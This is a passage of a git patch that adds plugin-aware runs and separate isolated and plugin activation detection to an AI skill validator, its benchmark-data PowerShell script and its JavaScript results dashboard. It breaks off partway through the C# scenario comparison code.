From f70d7be62ce0b910fb3ce99f6ebe9a537815d181 Mon Sep 17 00:00:00 2001
From: Jan Krivanek <jankrivanek@microsoft.com>
Date: Thu, 12 Mar 2026 21:22:57 +0100
Subject: [PATCH 1/3] Add plugin-aware skill validation with activation
 detection

---
 eng/dashboard/dashboard.js                    | 323 +++++++++++++++---
 eng/dashboard/generate-benchmark-data.ps1     | 102 +++++-
 .../src/Commands/ValidateCommand.cs           | 283 ++++++++++-----
 eng/skill-validator/src/Models/Models.cs      |  20 +-
 .../src/Services/AgentRunner.cs               | 160 +++++++--
 .../src/Services/Comparator.cs                |  20 +-
 .../src/Services/MetricsCollector.cs          |  18 +-
 .../src/Services/PairwiseJudge.cs             |   2 +-
 eng/skill-validator/src/Services/Reporter.cs  | 315 +++++++++++++----
 .../src/Services/SkillDiscovery.cs            |  61 ++++
 eng/skill-validator/tests/ComparatorTests.cs  |  31 ++
 eng/skill-validator/tests/DiscoveryTests.cs   |  93 +++++
 eng/skill-validator/tests/MetricsTests.cs     | 137 ++++++++
 .../tests/OverfittingJudgeTests.cs            |  22 +-
 eng/skill-validator/tests/RunnerTests.cs      |  94 +++--
 15 files changed, 1388 insertions(+), 293 deletions(-)
diff --git a/eng/dashboard/dashboard.js b/eng/dashboard/dashboard.js
index b8f5e58265..b0e731d302 100644
--- a/eng/dashboard/dashboard.js
+++ b/eng/dashboard/dashboard.js
@@ -160,14 +160,16 @@
     if (qualityEntries.length > 0) {
       // Use only the most recent entries for summary cards
       const recentEntries = qualityEntries.slice(-SUMMARY_WINDOW);
-      let skilledTotal = 0, skilledCount = 0, vanillaTotal = 0, vanillaCount = 0;
+      let skilledTotal = 0, skilledCount = 0, pluginTotal = 0, pluginCount = 0, vanillaTotal = 0, vanillaCount = 0;
       recentEntries.forEach(entry => {
         entry.benches.forEach(b => {
           if (b.name.endsWith('- Skilled Quality')) { skilledTotal += b.value; skilledCount++; }
+          if (b.name.endsWith('- Plugin Quality')) { pluginTotal += b.value; pluginCount++; }
           if (b.name.endsWith('- Vanilla Quality')) { vanillaTotal += b.value; vanillaCount++; }
         });
       });
       const skilledAvg = skilledCount > 0 ? skilledTotal / skilledCount : null;
+      const pluginAvg = pluginCount > 0 ? pluginTotal / pluginCount : null;
       const vanillaAvg = vanillaCount > 0 ? vanillaTotal / vanillaCount : null;
       const latestModel = qualityEntries[qualityEntries.length - 1].model;
       const windowLabel = qualityEntries.length > SUMMARY_WINDOW
@@ -177,22 +179,43 @@
         const delta = (skilledAvg - vanillaAvg).toFixed(2);
         const deltaClass = delta > 0 ? 'positive' : delta < 0 ? 'negative' : 'neutral';
         const deltaSign = delta > 0 ? '+' : '';
-        summaryDiv.innerHTML = `
+        let cardsHtml = `
           <div class="card">
-            <div class="card-label">Skilled Avg</div>
+            <div class="card-label">Skilled (Isolated) Avg</div>
             <div class="card-value" style="color: var(--skilled)">${skilledAvg.toFixed(2)}</div>
             <div class="card-delta">${windowLabel}</div>
-          </div>
+          </div>`;
+        if (pluginAvg !== null) {
+          cardsHtml += `
+          <div class="card">
+            <div class="card-label">Skilled (Plugin) Avg</div>
+            <div class="card-value" style="color: #3fb950">${pluginAvg.toFixed(2)}</div>
+            <div class="card-delta">${windowLabel}</div>
+          </div>`;
+        }
+        cardsHtml += `
           <div class="card">
             <div class="card-label">Vanilla Avg</div>
             <div class="card-value" style="color: var(--vanilla)">${vanillaAvg.toFixed(2)}</div>
             <div class="card-delta">${windowLabel}</div>
           </div>
           <div class="card">
-            <div class="card-label">Delta</div>
+            <div class="card-label">Delta (Isolated)</div>
             <div class="card-value ${deltaClass}">${deltaSign}${delta}</div>
             <div class="card-delta ${deltaClass}">${delta > 0 ? 'Skills improve quality' : delta < 0 ? 'Skills degrade quality' : 'No difference'}</div>
-          </div>
+          </div>`;
+        if (pluginAvg !== null && vanillaAvg !== null) {
+          const pluginDelta = (pluginAvg - vanillaAvg).toFixed(2);
+          const pluginDeltaClass = pluginDelta > 0 ? 'positive' : pluginDelta < 0 ? 'negative' : 'neutral';
+          const pluginDeltaSign = pluginDelta > 0 ? '+' : '';
+          cardsHtml += `
+          <div class="card">
+            <div class="card-label">Delta (Plugin)</div>
+            <div class="card-value ${pluginDeltaClass}">${pluginDeltaSign}${pluginDelta}</div>
+            <div class="card-delta ${pluginDeltaClass}">${pluginDelta > 0 ? 'Plugin improves quality' : pluginDelta < 0 ? 'Plugin degrades quality' : 'No difference'}</div>
+          </div>`;
+        }
+        cardsHtml += `
           <div class="card">
             <div class="card-label">Data Points</div>
             <div class="card-value">${qualityEntries.length}</div>
@@ -204,6 +227,7 @@
             <div class="card-delta">latest run</div>
           </div>
         `;
+        summaryDiv.innerHTML = cardsHtml;
       }
 
       // Count not-activated entries
@@ -267,19 +291,32 @@
     if (qualityEntries.length > 0) {
       // Discover tests from all entries (not just latest, which may have partial data)
       const tests = new Set();
+      let hasAnyPlugin = false;
       qualityEntries.forEach(entry => {
         entry.benches.forEach(b => {
-          const match = b.name.match(/^(.+) - (Skilled|Vanilla) Quality$/);
-          if (match) tests.add(match[1]);
+          const match = b.name.match(/^(.+) - (Skilled|Plugin|Vanilla) Quality$/);
+          if (match) {
+            tests.add(match[1]);
+            if (match[2] === 'Plugin') hasAnyPlugin = true;
+          }
         });
       });
 
       tests.forEach(test => {
-        createPairedChart(
-          qualityChartsDiv, test, qualityEntries,
-          `${test} - Skilled Quality`, `${test} - Vanilla Quality`,
-          'Skilled', 'Vanilla', '#58a6ff', '#8b949e'
-        );
+        if (hasAnyPlugin) {
+          createTripleChart(
+            qualityChartsDiv, test, qualityEntries,
+            `${test} - Skilled Quality`, `${test} - Plugin Quality`, `${test} - Vanilla Quality`,
+            'Isolated', 'Plugin', 'Vanilla',
+            '#58a6ff', '#3fb950', '#8b949e'
+          );
+        } else {
+          createPairedChart(
+            qualityChartsDiv, test, qualityEntries,
+            `${test} - Skilled Quality`, `${test} - Vanilla Quality`,
+            'Skilled', 'Vanilla', '#58a6ff', '#8b949e'
+          );
+        }
       });
     }
 
@@ -288,10 +325,13 @@
     if (efficiencyEntries.length > 0) {
       // Discover tests from all entries (not just latest, which may have partial data)
       const effTests = new Set();
+      let hasAnyPluginEff = false;
       efficiencyEntries.forEach(entry => {
         entry.benches.forEach(b => {
-          const match = b.name.match(/^(.+) - Skilled Time$/);
-          if (match) effTests.add(match[1]);
+          const matchSkilled = b.name.match(/^(.+) - Skilled Time$/);
+          if (matchSkilled) effTests.add(matchSkilled[1]);
+          const matchPlugin = b.name.match(/^(.+) - Plugin Time$/);
+          if (matchPlugin) { effTests.add(matchPlugin[1]); hasAnyPluginEff = true; }
         });
       });
 
@@ -310,15 +350,20 @@
         // Precompute per-entry data in a single pass over e.benches
         const timeName = `${test} - Skilled Time`;
         const tokenName = `${test} - Skilled Tokens In`;
+        const plugTimeName = `${test} - Plugin Time`;
+        const plugTokenName = `${test} - Plugin Tokens In`;
         const legendFlags = { notActivated: false, timedOut: false, overfittingModerate: false, overfittingHigh: false, multiIssue: false };
 
         const perEntryData = efficiencyEntries.map(e => {
           let timeBench = undefined;
           let tokenBench = undefined;
+          let plugTimeBench = undefined;
+          let plugTokenBench = undefined;
           for (const b of e.benches) {
             if (!timeBench && b.name === timeName) timeBench = b;
             else if (!tokenBench && b.name === tokenName) tokenBench = b;
-            if (timeBench && tokenBench) break;
+            else if (!plugTimeBench && b.name === plugTimeName) plugTimeBench = b;
+            else if (!plugTokenBench && b.name === plugTokenName) plugTokenBench = b;
           }
           const timeNA = !!(timeBench && timeBench.notActivated);
           const tokenNA = !!(tokenBench && tokenBench.notActivated);
@@ -344,11 +389,15 @@
             tokenNotActivated: tokenNA,
             tokenTimedOut: tokenTO,
             tokenOverfitting: tokenOF,
+            plugTimeValue: plugTimeBench ? plugTimeBench.value : null,
+            plugTokenValue: plugTokenBench ? plugTokenBench.value / 1000 : null,
           };
         });
 
         const timeData = perEntryData.map(d => d.timeValue);
         const tokenData = perEntryData.map(d => d.tokenValue);
+        const plugTimeData = perEntryData.map(d => d.plugTimeValue);
+        const plugTokenData = perEntryData.map(d => d.plugTokenValue);
 
         // Per-point styling using shared helper
         const timeAp = perEntryData.map(d => getPointAppearance({ timedOut: d.timeTimedOut, notActivated: d.timeNotActivated, overfitting: d.timeOverfitting }, '#f0883e'));
@@ -362,41 +411,70 @@
         const tokenPointRadius = tokenAp.map(a => a.radius);
         const tokenPointBorderWidth = tokenAp.map(a => a.borderWidth);
 
+        const datasets = [
+          {
+            label: 'Isolated Time (s)',
+            data: timeData,
+            borderColor: '#f0883e',
+            borderWidth: 2,
+            pointBackgroundColor: timePointBg,
+            pointBorderColor: timePointBg,
+            pointRadius: timePointRadius,
+            pointBorderWidth: timePointBorderWidth,
+            pointStyle: timePointStyle,
+            tension: 0.3,
+            fill: false,
+            yAxisID: 'y'
+          },
+          {
+            label: 'Isolated Tokens (k)',
+            data: tokenData,
+            borderColor: '#a371f7',
+            borderWidth: 2,
+            pointBackgroundColor: tokenPointBg,
+            pointBorderColor: tokenPointBg,
+            pointRadius: tokenPointRadius,
+            pointBorderWidth: tokenPointBorderWidth,
+            pointStyle: tokenPointStyle,
+            tension: 0.3,
+            borderDash: [5, 5],
+            fill: false,
+            yAxisID: 'y1'
+          }
+        ];
+
+        // Add plugin efficiency datasets if any plugin data exists
+        if (hasAnyPluginEff) {
+          datasets.push({
+            label: 'Plugin Time (s)',
+            data: plugTimeData,
+            borderColor: '#3fb950',
+            borderWidth: 2,
+            pointRadius: 4,
+            pointHoverRadius: 6,
+            tension: 0.3,
+            fill: false,
+            yAxisID: 'y'
+          });
+          datasets.push({
+            label: 'Plugin Tokens (k)',
+            data: plugTokenData,
+            borderColor: '#56d364',
+            borderWidth: 2,
+            pointRadius: 4,
+            pointHoverRadius: 6,
+            tension: 0.3,
+            borderDash: [5, 5],
+            fill: false,
+            yAxisID: 'y1'
+          });
+        }
+
         new Chart(canvas, {
           type: 'line',
           data: {
             labels,
-            datasets: [
-              {
-                label: 'Time (s)',
-                data: timeData,
-                borderColor: '#f0883e',
-                borderWidth: 2,
-                pointBackgroundColor: timePointBg,
-                pointBorderColor: timePointBg,
-                pointRadius: timePointRadius,
-                pointBorderWidth: timePointBorderWidth,
-                pointStyle: timePointStyle,
-                tension: 0.3,
-                fill: false,
-                yAxisID: 'y'
-              },
-              {
-                label: 'Tokens In (k)',
-                data: tokenData,
-                borderColor: '#a371f7',
-                borderWidth: 2,
-                pointBackgroundColor: tokenPointBg,
-                pointBorderColor: tokenPointBg,
-                pointRadius: tokenPointRadius,
-                pointBorderWidth: tokenPointBorderWidth,
-                pointStyle: tokenPointStyle,
-                tension: 0.3,
-                borderDash: [5, 5],
-                fill: false,
-                yAxisID: 'y1'
-              }
-            ]
+            datasets
           },
           options: {
             responsive: true,
@@ -445,6 +523,157 @@
     }
   }
 
+  // Helper: create a triple line chart (baseline, isolated, plugin)
+  function createTripleChart(container, title, entries, nameA, nameB, nameC, labelA, labelB, labelC, colorA, colorB, colorC) {
+    const div = document.createElement('div');
+    div.className = 'chart-container';
+    div.innerHTML = `<h3>${title}</h3><canvas></canvas>`;
+    container.appendChild(div);
+    const canvas = div.querySelector('canvas');
+
+    const labels = entries.map(e => {
+      const d = new Date(e.date);
+      return d.toLocaleDateString('en-US', { month: 'short', day: 'numeric', hour: '2-digit', minute: '2-digit' });
+    });
+
+    // Precompute per-entry data in a single pass
+    const legendFlags = { notActivated: false, timedOut: false, overfittingModerate: false, overfittingHigh: false, multiIssue: false };
+    const perEntryData = entries.map(e => {
+      let benchA = undefined, benchB = undefined, benchC = undefined;
+      for (const b of e.benches) {
+        if (!benchA && b.name === nameA) benchA = b;
+        else if (!benchB && b.name === nameB) benchB = b;
+        else if (!benchC && b.name === nameC) benchC = b;
+        if (benchA && benchB && benchC) break;
+      }
+      const aNotActivated = !!(benchA && benchA.notActivated);
+      const aTimedOut = !!(benchA && benchA.timedOut);
+      const aOverfitting = benchA && benchA.overfitting ? benchA.overfitting : null;
+      const bNotActivated = !!(benchB && benchB.notActivated);
+      const bTimedOut = !!(benchB && benchB.timedOut);
+      const bOverfitting = benchB && benchB.overfitting ? benchB.overfitting : null;
+      if (aNotActivated || bNotActivated) legendFlags.notActivated = true;
+      if (aTimedOut || bTimedOut) legendFlags.timedOut = true;
+      if (aOverfitting || bOverfitting) {
+        if (aOverfitting === 'high' || bOverfitting === 'high') legendFlags.overfittingHigh = true;
+        else legendFlags.overfittingModerate = true;
+      }
+      const aIssues = (aNotActivated ? 1 : 0) + (aTimedOut ? 1 : 0) + (aOverfitting ? 1 : 0);
+      const bIssues = (bNotActivated ? 1 : 0) + (bTimedOut ? 1 : 0) + (bOverfitting ? 1 : 0);
+      if (aIssues > 1 || bIssues > 1) legendFlags.multiIssue = true;
+      return {
+        valueA: benchA ? benchA.value : null,
+        valueB: benchB ? benchB.value : null,
+        valueC: benchC ? benchC.value : null,
+        aNotActivated, aTimedOut, aOverfitting,
+        bNotActivated, bTimedOut, bOverfitting,
+      };
+    });
+
+    const dataA = perEntryData.map(d => d.valueA);
+    const dataB = perEntryData.map(d => d.valueB);
+    const dataC = perEntryData.map(d => d.valueC);
+
+    // Per-point styling for dataset A (Isolated) and B (Plugin)
+    const pointApA = perEntryData.map(d => getPointAppearance({ timedOut: d.aTimedOut, notActivated: d.aNotActivated, overfitting: d.aOverfitting }, colorA));
+    const pointBgA = pointApA.map(a => a.color);
+    const pointBorderA = pointApA.map(a => a.color);
+    const pointRadiusA = pointApA.map(a => a.radius);
+    const pointStyleA = pointApA.map(a => a.style);
+    const pointBorderWidthA = pointApA.map(a => a.borderWidth);
+    const pointApB = perEntryData.map(d => getPointAppearance({ timedOut: d.bTimedOut, notActivated: d.bNotActivated, overfitting: d.bOverfitting }, colorB));
+    const pointBgB = pointApB.map(a => a.color);
+    const pointBorderB = pointApB.map(a => a.color);
+    const pointRadiusB = pointApB.map(a => a.radius);
+    const pointStyleB = pointApB.map(a => a.style);
+    const pointBorderWidthB = pointApB.map(a => a.borderWidth);
+
+    new Chart(canvas, {
+      type: 'line',
+      data: {
+        labels,
+        datasets: [
+          {
+            label: labelA,
+            data: dataA,
+            borderColor: colorA,
+            backgroundColor: colorA + '20',
+            borderWidth: 2,
+            pointBackgroundColor: pointBgA,
+            pointBorderColor: pointBorderA,
+            pointRadius: pointRadiusA,
+            pointBorderWidth: pointBorderWidthA,
+            pointStyle: pointStyleA,
+            pointHoverRadius: 8,
+            tension: 0.3,
+            fill: false
+          },
+          {
+            label: labelB,
+            data: dataB,
+            borderColor: colorB,
+            backgroundColor: colorB + '20',
+            borderWidth: 2,
+            pointBackgroundColor: pointBgB,
+            pointBorderColor: pointBorderB,
+            pointRadius: pointRadiusB,
+            pointBorderWidth: pointBorderWidthB,
+            pointStyle: pointStyleB,
+            pointHoverRadius: 8,
+            tension: 0.3,
+            fill: false
+          },
+          {
+            label: labelC,
+            data: dataC,
+            borderColor: colorC,
+            backgroundColor: colorC + '20',
+            borderWidth: 2,
+            pointRadius: 4,
+            pointHoverRadius: 6,
+            tension: 0.3,
+            borderDash: [5, 5],
+            fill: false
+          }
+        ]
+      },
+      options: {
+        responsive: true,
+        interaction: { mode: 'index', intersect: false },
+        plugins: {
+          legend: { labels: { color: '#8b949e', font: { size: 11 }, usePointStyle: true } },
+          tooltip: {
+            callbacks: {
+              afterTitle: (items) => {
+                const idx = items[0].dataIndex;
+                const entry = entries[idx];
+                const parts = [];
+                if (entry && entry.model) parts.push(`Model: ${entry.model}`);
+                if (entry && entry.commit) {
+                  const msg = entry.commit.message.split('\n')[0];
+                  parts.push(msg.length > 60 ? msg.substring(0, 60) + '...' : msg);
+                }
+                parts.push(...buildIssueTooltipLines(entry, b => b.name === nameA || b.name === nameB || b.name === nameC));
+                return parts.join('\n');
+              }
+            }
+          }
+        },
+        scales: {
+          x: { ticks: { color: '#8b949e' }, grid: { color: '#30363d' } },
+          y: {
+            ticks: { color: '#8b949e' },
+            grid: { color: '#30363d' },
+            suggestedMin: 0,
+            suggestedMax: 10
+          }
+        }
+      }
+    });
+
+    appendLegendNotes(div, legendFlags);
+  }
+
   // Helper: create a paired line chart
   function createPairedChart(container, title, entries, nameA, nameB, labelA, labelB, colorA, colorB) {
     const div = document.createElement('div');
diff --git a/eng/dashboard/generate-benchmark-data.ps1 b/eng/dashboard/generate-benchmark-data.ps1
index c227467e8f..16e9d564e5 100644
--- a/eng/dashboard/generate-benchmark-data.ps1
+++ b/eng/dashboard/generate-benchmark-data.ps1
@@ -128,15 +128,15 @@ foreach ($verdict in $results.verdicts) {
         # roll-up across all scenarios and must NOT be used here — each datapoint
         # should reflect only its own scenario's activation result).
         $notActivated = $false
-        if ($scenario.skillActivation -and -not $scenario.skillActivation.activated) {
-            # Only flag as not-activated if activation was expected (expect_activation defaults to true)
-            $expectActivation = $true
-            if ($scenario.PSObject.Properties['expectActivation'] -and $scenario.expectActivation -eq $false) {
-                $expectActivation = $false
-            }
-            if ($expectActivation) {
-                $notActivated = $true
-            }
+        # Determine whether activation is expected (defaults to true)
+        $expectActivation = $true
+        if ($scenario.PSObject.Properties['expectActivation'] -and $scenario.expectActivation -eq $false) {
+            $expectActivation = $false
+        }
+        # Support both old (skillActivation) and new (skillActivationIsolated) JSON schemas
+        $sa = if ($scenario.PSObject.Properties['skillActivationIsolated']) { $scenario.skillActivationIsolated } else { $scenario.skillActivation }
+        if ($sa -and -not $sa.activated -and $expectActivation) {
+            $notActivated = $true
         }
 
         # Check per-scenario timeout state
@@ -184,12 +184,18 @@ foreach ($verdict in $results.verdicts) {
             }
         }
 
+        # Support both old (withSkill) and new (skilledIsolated) JSON schemas
+        $skilled = if ($scenario.PSObject.Properties['skilledIsolated']) { $scenario.skilledIsolated } else { $scenario.withSkill }
+
+        # Plugin run (may not exist for older results or utility methods)
+        $plugin = if ($scenario.PSObject.Properties['skilledPlugin']) { $scenario.skilledPlugin } else { $null }
+
         # Quality scores (from judge results, scale 0-5 mapped to 0-10 for dashboard)
-        if ($null -ne $scenario.withSkill.judgeResult.overallScore) {
+        if ($null -ne $skilled.judgeResult.overallScore) {
             $benchEntry = @{
                 name  = "$testName - Skilled Quality"
                 unit  = "Score (0-10)"
-                value = [float]$scenario.withSkill.judgeResult.overallScore * 2
+                value = [float]$skilled.judgeResult.overallScore * 2
             }
             if ($notActivated) {
                 $benchEntry.notActivated = $true
@@ -203,6 +209,26 @@ foreach ($verdict in $results.verdicts) {
             }
             $qualityBenches.Add($benchEntry)
         }
+        if ($null -ne $plugin -and $null -ne $plugin.judgeResult.overallScore) {
+            $pluginBenchEntry = @{
+                name  = "$testName - Plugin Quality"
+                unit  = "Score (0-10)"
+                value = [float]$plugin.judgeResult.overallScore * 2
+            }
+            # Plugin activation check
+            $saPlugin = if ($scenario.PSObject.Properties['skillActivationPlugin']) { $scenario.skillActivationPlugin } else { $null }
+            if ($saPlugin -and -not $saPlugin.activated -and $expectActivation) {
+                $pluginBenchEntry.notActivated = $true
+            }
+            if ($scenarioTimedOut) {
+                $pluginBenchEntry.timedOut = $true
+            }
+            if ($overfittingSeverity) {
+                $pluginBenchEntry.overfitting = $overfittingSeverity
+                $pluginBenchEntry.overfittingScore = $overfittingScore
+            }
+            $qualityBenches.Add($pluginBenchEntry)
+        }
         if ($null -ne $scenario.baseline.judgeResult.overallScore) {
             $qualityBenches.Add(@{
                 name  = "$testName - Vanilla Quality"
@@ -211,12 +237,12 @@ foreach ($verdict in $results.verdicts) {
             })
         }
 
-        # Efficiency metrics (from with-skill run)
-        if ($null -ne $scenario.withSkill.metrics.wallTimeMs) {
+        # Efficiency metrics (from with-skill isolated run)
+        if ($null -ne $skilled.metrics.wallTimeMs) {
             $effBenchEntry = @{
                 name  = "$testName - Skilled Time"
                 unit  = "seconds"
-                value = [math]::Round([float]$scenario.withSkill.metrics.wallTimeMs / 1000, 1)
+                value = [math]::Round([float]$skilled.metrics.wallTimeMs / 1000, 1)
             }
             if ($notActivated) {
                 $effBenchEntry.notActivated = $true
@@ -230,11 +256,11 @@ foreach ($verdict in $results.verdicts) {
             }
             $efficiencyBenches.Add($effBenchEntry)
         }
-        if ($null -ne $scenario.withSkill.metrics.tokenEstimate) {
+        if ($null -ne $skilled.metrics.tokenEstimate) {
             $tokenBenchEntry = @{
                 name  = "$testName - Skilled Tokens In"
                 unit  = "tokens"
-                value = [float]$scenario.withSkill.metrics.tokenEstimate
+                value = [float]$skilled.metrics.tokenEstimate
             }
             if ($notActivated) {
                 $tokenBenchEntry.notActivated = $true
@@ -248,6 +274,50 @@ foreach ($verdict in $results.verdicts) {
             }
             $efficiencyBenches.Add($tokenBenchEntry)
         }
+
+        # Efficiency metrics (from plugin run, if exists)
+        # Compute plugin-specific notActivated signal for efficiency benches
+        $pluginNotActivated = $false
+        $saPlugin = if ($scenario.PSObject.Properties['skillActivationPlugin']) { $scenario.skillActivationPlugin } else { $null }
+        if ($saPlugin -and -not $saPlugin.activated -and $expectActivation) {
+            $pluginNotActivated = $true
+        }
+        if ($null -ne $plugin -and $null -ne $plugin.metrics.wallTimeMs) {
+            $pluginTimeBench = @{
+                name  = "$testName - Plugin Time"
+                unit  = "seconds"
+                value = [math]::Round([float]$plugin.metrics.wallTimeMs / 1000, 1)
+            }
+            if ($pluginNotActivated) {
+                $pluginTimeBench.notActivated = $true
+            }
+            if ($scenarioTimedOut) {
+                $pluginTimeBench.timedOut = $true
+            }
+            if ($overfittingSeverity) {
+                $pluginTimeBench.overfitting = $overfittingSeverity
+                $pluginTimeBench.overfittingScore = $overfittingScore
+            }
+            $efficiencyBenches.Add($pluginTimeBench)
+        }
+        if ($null -ne $plugin -and $null -ne $plugin.metrics.tokenEstimate) {
+            $pluginTokenBench = @{
+                name  = "$testName - Plugin Tokens In"
+                unit  = "tokens"
+                value = [float]$plugin.metrics.tokenEstimate
+            }
+            if ($pluginNotActivated) {
+                $pluginTokenBench.notActivated = $true
+            }
+            if ($scenarioTimedOut) {
+                $pluginTokenBench.timedOut = $true
+            }
+            if ($overfittingSeverity) {
+                $pluginTokenBench.overfitting = $overfittingSeverity
+                $pluginTokenBench.overfittingScore = $overfittingScore
+            }
+            $efficiencyBenches.Add($pluginTokenBench)
+        }
     }
 }
 
diff --git a/eng/skill-validator/src/Commands/ValidateCommand.cs b/eng/skill-validator/src/Commands/ValidateCommand.cs
index 7220b3805d..2e18b23a7b 100644
--- a/eng/skill-validator/src/Commands/ValidateCommand.cs
+++ b/eng/skill-validator/src/Commands/ValidateCommand.cs
@@ -188,6 +188,22 @@ public static async Task<int> Run(ValidatorConfig config)
             Console.WriteLine($"Noise test enabled: discovered {noiseSkills.Count} noise skill(s) from {config.NoiseSkillsDir}");
         }
 
+        // Group skills by their plugin — standalone skills are errors
+        var (_, pluginErrors) = SkillDiscovery.GroupSkillsByPlugin(allSkills);
+        foreach (var error in pluginErrors)
+            Console.Error.WriteLine($"\x1b[31m❌ {error}\x1b[0m");
+        if (pluginErrors.Count > 0)
+        {
+            if (allSkills.Count == pluginErrors.Count)
+            {
+                Console.Error.WriteLine("\x1b[31mAll skills are standalone (no valid plugin.json found) — nothing to evaluate.\x1b[0m");
+                return 1;
+            }
+            // Filter out standalone skills — they would silently run without a
+            // real plugin context, producing misleading "plugin" results.
+            allSkills = allSkills.Where(s => SkillDiscovery.FindPluginRoot(s.Path) is not null).ToList();
+        }
+
         // Check per-plugin aggregate description size
         var aggregateFailures = CheckAggregateDescriptionLimits(allSkills);
         if (aggregateFailures.Count > 0)
@@ -310,7 +326,7 @@ await Reporter.ReportResults(verdicts, config.Reporters, config.Verbose,
             Console.Error.WriteLine();
         }
 
-        await AgentRunner.StopSharedClient();
+        await AgentRunner.StopAllClients();
         await AgentRunner.CleanupWorkDirs();
 
         // Always fail on execution errors, even in --verdict-warn-only mode
@@ -489,11 +505,10 @@ internal static List<string> CheckAggregateDescriptionLimits(IReadOnlyList<Skill
             }
         }
 
-        var notActivated = comparisons.Where(c => c.SkillActivation is { Activated: false }).ToList();
-        // Separate unexpected non-activations (expect_activation defaulting to true)
-        // from expected ones (negative tests with expect_activation: false).
-        var unexpectedNotActivated = notActivated.Where(c => c.ExpectActivation).ToList();
-        var expectedNotActivated = notActivated.Where(c => !c.ExpectActivation).ToList();
+        var notActivatedIsolated = comparisons.Where(c => c.SkillActivationIsolated is { Activated: false } && c.ExpectActivation).ToList();
+        var notActivatedPlugin = comparisons.Where(c => c.SkillActivationPlugin is { Activated: false } && c.ExpectActivation).ToList();
+        var expectedNotActivated = comparisons.Where(c =>
+            (c.SkillActivationIsolated is { Activated: false } || c.SkillActivationPlugin is { Activated: false }) && !c.ExpectActivation).ToList();
 
         if (expectedNotActivated.Count > 0)
         {
@@ -501,14 +516,23 @@ internal static List<string> CheckAggregateDescriptionLimits(IReadOnlyList<Skill
             log($"\x1b[36mℹ️  Skill correctly NOT activated in negative-test scenario(s): {names}\x1b[0m");
         }
 
-        if (unexpectedNotActivated.Count > 0)
+        if (notActivatedIsolated.Count > 0)
         {
-            var names = string.Join(", ", unexpectedNotActivated.Select(c => c.ScenarioName));
-            log($"\x1b[33m\u26a0\ufe0f  Skill was NOT activated in scenario(s): {names}\x1b[0m");
+            var names = string.Join(", ", notActivatedIsolated.Select(c => c.ScenarioName));
+            log($"\x1b[33m⚠️  Skill NOT activated (isolated) in: {names}\x1b[0m");
             verdict.SkillNotActivated = true;
             verdict.Passed = false;
             verdict.FailureKind = "skill_not_activated";
-            verdict.Reason += $" [SKILL NOT ACTIVATED in {unexpectedNotActivated.Count} scenario(s): {names}]";
+            verdict.Reason += $" [NOT ACTIVATED (isolated) in {notActivatedIsolated.Count} scenario(s)]";
+        }
+        if (notActivatedPlugin.Count > 0)
+        {
+            var names = string.Join(", ", notActivatedPlugin.Select(c => c.ScenarioName));
+            log($"\x1b[33m⚠️  Skill NOT activated (plugin) in: {names}\x1b[0m");
+            verdict.SkillNotActivated = true;
+            verdict.Passed = false;
+            verdict.FailureKind = "skill_not_activated";
+            verdict.Reason += $" [NOT ACTIVATED (plugin) in {notActivatedPlugin.Count} scenario(s)]";
         }
 
         var timedOutScenarios = comparisons.Where(c => c.TimedOut).ToList();
@@ -544,34 +568,97 @@ private static async Task<ScenarioComparison> ExecuteScenario(
         scenarioLog($"✓ All {config.Runs} run(s) complete");
 
         var baselineRuns = runResults.Select(r => r.Baseline).ToList();
-        var withSkillRuns = runResults.Select(r => r.WithSkill).ToList();
+        var isolatedRuns = runResults.Select(r => r.SkilledIsolated).ToList();
+        var pluginRuns = runResults.Select(r => r.SkilledPlugin).ToList();
         var perRunPairwise = runResults.Select(r => r.Pairwise).ToList();
 
-        var perRunScores = new List<double>();
+        // Per-run improvement scores — effective score is min(isolated, plugin)
+        // Pairwise result is generated against the worse-scoring run (isolated
+        // or plugin).  Apply it only to that matching comparison so it does not
+        // skew the other one.
+        var perRunIsolatedScores = new List<double>();
+        var perRunPluginScores = new List<double>();
         for (int i = 0; i < baselineRuns.Count; i++)
         {
-            var runComparison = Comparator.CompareScenario(scenario.Name, baselineRuns[i], withSkillRuns[i], perRunPairwise[i]);
-            perRunScores.Add(runComparison.ImprovementScore);
+            var pw = perRunPairwise[i];
+            bool pairwiseFromPlugin = runResults[i].PairwiseFromPlugin;
+            var isoComp = Comparator.CompareScenario(scenario.Name, baselineRuns[i], isolatedRuns[i],
+                pairwiseFromPlugin ? null : pw);
+            var plgComp = Comparator.CompareScenario(scenario.Name, baselineRuns[i], pluginRuns[i],
+                pairwiseFromPlugin ? pw : null);
+            perRunIsolatedScores.Add(isoComp.ImprovementScore);
+            perRunPluginScores.Add(plgComp.ImprovementScore);
         }
 
-        var avgBaseline = AverageResults(baselineRuns);
-        var avgWithSkill = AverageResults(withSkillRuns);
-        var bestPairwise = perRunPairwise.FirstOrDefault(pw => pw?.PositionSwapConsistent == true)
-            ?? perRunPairwise.FirstOrDefault();
+        var perRunScores = perRunIsolatedScores
+            .Zip(perRunPluginScores, (iso, plg) => Math.Min(iso, plg))
+            .ToList();
 
-        var comparison = Comparator.CompareScenario(scenario.Name, avgBaseline, avgWithSkill, bestPairwise);
+        var avgBaseline = AverageResults(baselineRuns);
+        var avgIsolated = AverageResults(isolatedRuns);
+        var avgPlugin = AverageResults(pluginRuns);
+        // Select the best pairwise result and track which run it came from
+        int bestPairwiseIdx = -1;
+        for (int i = 0; i < perRunPairwise.Count; i++)
+        {
+            if (perRunPairwise[i]?.PositionSwapConsistent == true) { bestPairwiseIdx = i; break; }
+        }
+        if (bestPairwiseIdx < 0)
+        {
+            for (int i = 0; i < perRunPairwise.Count; i++)
+            {
+                if (perRunPairwise[i] is not null) { bestPairwiseIdx = i; break; }
+            }
+        }
+        var bestPairwise = bestPairwiseIdx >= 0 ? perRunPairwise[bestPairwiseIdx] : null;
+
+        // Two comparisons — apply pairwise only to the matching one,
+        // using the source run's flag (not any-run) to avoid misattribution.
+        bool aggPairwiseFromPlugin = bestPairwiseIdx >= 0 && runResults[bestPairwiseIdx].PairwiseFromPlugin;
+        var isoComparison = Comparator.CompareScenario(scenario.Name, avgBaseline, avgIsolated,
+            aggPairwiseFromPlugin ? null : bestPairwise);
+        var plgComparison = Comparator.CompareScenario(scenario.Name, avgBaseline, avgPlugin,
+            aggPairwiseFromPlugin ? bestPairwise : null);
+
+        // Build the combined ScenarioComparison
+        var comparison = new ScenarioComparison
+        {
+            ScenarioName = scenario.Name,
+            Baseline = avgBaseline,
+            SkilledIsolated = avgIsolated,
+            SkilledPlugin = avgPlugin,
+            ImprovementScore = Math.Min(isoComparison.ImprovementScore, plgComparison.ImprovementScore),
+            IsolatedImprovementScore = isoComparison.ImprovementScore,
